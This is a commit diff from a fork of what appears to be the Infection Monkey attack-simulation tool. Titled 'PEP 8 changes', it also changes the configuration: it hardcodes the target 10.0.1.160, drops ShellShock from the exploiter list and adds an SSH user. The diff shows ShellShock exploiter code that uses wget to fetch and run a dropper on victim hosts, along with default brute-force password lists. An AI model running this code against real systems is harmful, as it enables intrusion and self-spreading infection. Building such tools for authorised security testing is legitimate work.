forked from p34709852/monkey
PEP 8 changes
This commit is contained in:
parent
1806f9bc62
commit
cd27438a1e
|
@ -135,7 +135,7 @@ class Configuration(object):
|
|||
scanner_class = TcpScanner
|
||||
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
|
||||
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
|
||||
SSHExploiter, ShellShockExploiter #Linux
|
||||
SSHExploiter #Linux
|
||||
]
|
||||
|
||||
# how many victims to look for in a single scan iteration
|
||||
|
@ -167,11 +167,11 @@ class Configuration(object):
|
|||
###########################
|
||||
|
||||
# Auto detect and scan local subnets
|
||||
local_network_scan = True
|
||||
local_network_scan = False
|
||||
|
||||
range_class = FixedRange
|
||||
range_size = 1
|
||||
range_fixed = ['']
|
||||
range_fixed = ['10.0.1.160']
|
||||
|
||||
# TCP Scanner
|
||||
HTTP_PORTS = [80, 8080, 443,
|
||||
|
@ -201,7 +201,7 @@ class Configuration(object):
|
|||
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
|
||||
|
||||
# ssh exploiter
|
||||
ssh_users = ["root"]
|
||||
ssh_users = ["root",'user']
|
||||
ssh_passwords = ["Password1!", "1234", "password", "12345678"]
|
||||
|
||||
# rdp exploiter
|
||||
|
|
|
@ -16,7 +16,6 @@ __author__ = 'danielg'
|
|||
|
||||
LOG = logging.getLogger(__name__)
|
||||
TIMEOUT = 2
|
||||
DOWNLOAD_TIMEOUT = 60
|
||||
TEST_COMMAND = '/bin/uname -a'
|
||||
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
|
||||
|
||||
|
@ -46,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
|
|||
|
||||
LOG.info(
|
||||
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
|
||||
host, ",".join([str(port[0]) for port in valid_ports]))
|
||||
host, ",".join([str(port[0]) for port in valid_ports]))
|
||||
)
|
||||
|
||||
attackable_urls = []
|
||||
|
@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
||||
return False
|
||||
|
||||
src_path = src_path or get_target_monkey(host)
|
||||
|
||||
|
||||
# copy the monkey
|
||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||
if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||
LOG.info("Host %s was already infected under the current configuration, done" % host)
|
||||
return True # return already infected
|
||||
return True # return already infected
|
||||
|
||||
src_path = src_path or get_target_monkey(host)
|
||||
if not src_path:
|
||||
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||
return False
|
||||
|
@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter):
|
|||
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
||||
return False
|
||||
|
||||
|
||||
download_command = '/usr/bin/wget %s -O %s;' % (
|
||||
http_path, dropper_target_path_linux)
|
||||
|
||||
download_and_run = exploit + download_command
|
||||
resp = self.attack_page(url, header, download_and_run)
|
||||
download = exploit + download_command
|
||||
self.attack_page(url, header, download)
|
||||
|
||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||
http_thread.stop()
|
||||
|
||||
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||
if (http_thread.downloads != 1) or (
|
||||
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||
continue
|
||||
|
||||
|
@ -134,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
|
|||
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
|
||||
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
|
||||
run_path = exploit + cmdline
|
||||
resp = self.attack_page(url, header, run_path)
|
||||
self.attack_page(url, header, run_path)
|
||||
|
||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||
self._config.dropper_target_path_linux, host, cmdline)
|
||||
|
||||
if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)):
|
||||
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
|
||||
LOG.info("Failed running the monkey, log file does not exist")
|
||||
continue
|
||||
|
||||
|
@ -206,7 +204,7 @@ class ShellShockExploiter(HostExploiter):
|
|||
return urls
|
||||
|
||||
@staticmethod
|
||||
def report_vuln_shellshock(host,url):
|
||||
def report_vuln_shellshock(host, url):
|
||||
from control import ControlClient
|
||||
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
|
||||
'exploiter': ShellShockExploiter.__name__,
|
||||
|
|
|
@ -425,4 +425,5 @@ def report_failed_login(exploiter, machine, user, password):
|
|||
from control import ControlClient
|
||||
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
|
||||
'exploiter': exploiter.__class__.__name__,
|
||||
'user':user,'password':password})
|
||||
'user':user,'password':password})
|
||||
|
||||
|
|
Loading…
Reference in New Issue